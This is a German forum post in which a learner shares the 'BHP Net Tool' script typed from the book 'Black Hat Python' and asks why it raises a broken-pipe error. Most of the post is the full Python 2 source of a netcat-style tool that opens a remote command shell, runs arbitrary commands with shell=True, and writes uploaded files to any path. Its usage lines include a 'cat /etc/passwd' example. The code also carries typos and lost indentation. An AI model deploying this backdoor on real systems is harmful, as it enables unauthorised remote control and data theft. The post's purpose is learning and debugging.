ich habe mich aus Interesse mal an ein Buch über hacking mit Python gesetzt.
In dem Buch ("Black hat Python") gibt es eine Schritt für Schritt Anleitung, die ich quasi einfach nur abgetippt habe.
Code: Alles auswählen
#!/usr/bin/env python
import sys
import socket
import getopt
import threading
import subprocess
#define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print "BHP Net Tool"
print
print "Usage: bhpnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to destination"
print
print
print "Examples: "
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo ABCDEFGHI | bhpnet.py -t 192.168.11.12 -p 135"
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#connect to target host
client.connect((target,port))
if len(buffer):
client.send(buffer)
while True:
#now wait for data back
recv_len = 1
responce = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print response,
#wait for more input
buffer = raw_input("")
buffer += "\n"
#send it off
client.send(buffer)
except:
print "[*] Exception! Exiting."
#tear down the connection
client.close()
def server_loop():
global target
#if no target is defined we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen (5)
while True:
client_socket, addr = server.accept()
#spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
#trim the newline
command = command.rstrip()
#run the command and get the output back
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
#send the output back to the client
return output
def client_handler (client_socket):
global upload
global execute
global command
#check if upload
if len(upload_destination):
#read in all of the bytes and write to our destination
file_buffer = ""
#keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
#now we take these bytesand try to write them out
try:
file_descriptor = open (upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
#acknowledge that we wrote the file out
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
#check for command execution
if len(execute):
#run the command
output = run_command(execute)
client_socket.send(output)
#now we go into another loop if a command shell was requested
if command:
while True:
#Show a simple prompt
client_socket.send("<Bhp:#>")
#now we receive until we see a linefeed (enter-key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
#send back the command output
response = run_command(cmd_buffer)
#send back the response
client_socket.send(response)
def main ():
#some global variables------
global listen
global port
global execute
global command
global upload_destination
global target
#----------------------------
if not len(sys.argv[1:]):
usage()
#read the commanline options
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:", ["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
#go throught the "opts" = options. o = option, a = parameter given via command-line
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e","--execute"):
execute = a
elif o in ("-c","--command"):
command = True
elif o in ("-u","--upload"):
upload_destination = a
elif o in ("-t","--target"):
target = a
elif o in ("-p","--port"):
port = int(a)
else:
assert False,"Unhandled Option"
#-----------------------------------------------------------------------------------
#are we going to listen or just send data from stdin?
if not listen and len(target) and port >0:
#read in the buffer from the commandline
#this will block, so send Ctrl+D if not sending input
#to stdin
buffer = sys.stdin.read()
#send data off
client_sender(buffer)
#we are going to listen and potentially upload things, execute commands,
#and drop a shell back depending on our command line options above
if listen:
server_loop()
main()
root@kali>./bhpnet.py -l -p 9999 -c
In einer zweiten shell sollte das dann so aussehen:
root@kali>./bhpnet.py -t localhost -p 9999
<CTRL-D>
<BHP:#> ls -la
total: ..
drwxr-xrwx ..... (ausgabe eines ls -la kommandos eben)
<BHP:#> pwd
/Users/..
<BHP:#> ...
aber immer, wenn ich Ctrl-d drücke, bekomme ich in Fenster 1 die Nachricht:
und in Fenster 2:Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 552, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 505, in run
self.__target(*self.__args, **self.__kwargs)
File "./bhpnet.py", line 152, in client_handler
client_socket.send("<Bhp:#>")
error: [Errno 32] Broken pipe
Code: Alles auswählen
[*] Exception! Exiting.
Ich bin den Code schon mehrere Male durchgegangen und finde auch keine Tippfehler (, bin ich blind?)..
Für eure Hilfe bin ich jetzt schon einmal sehr dankbar
Lg,
Do Re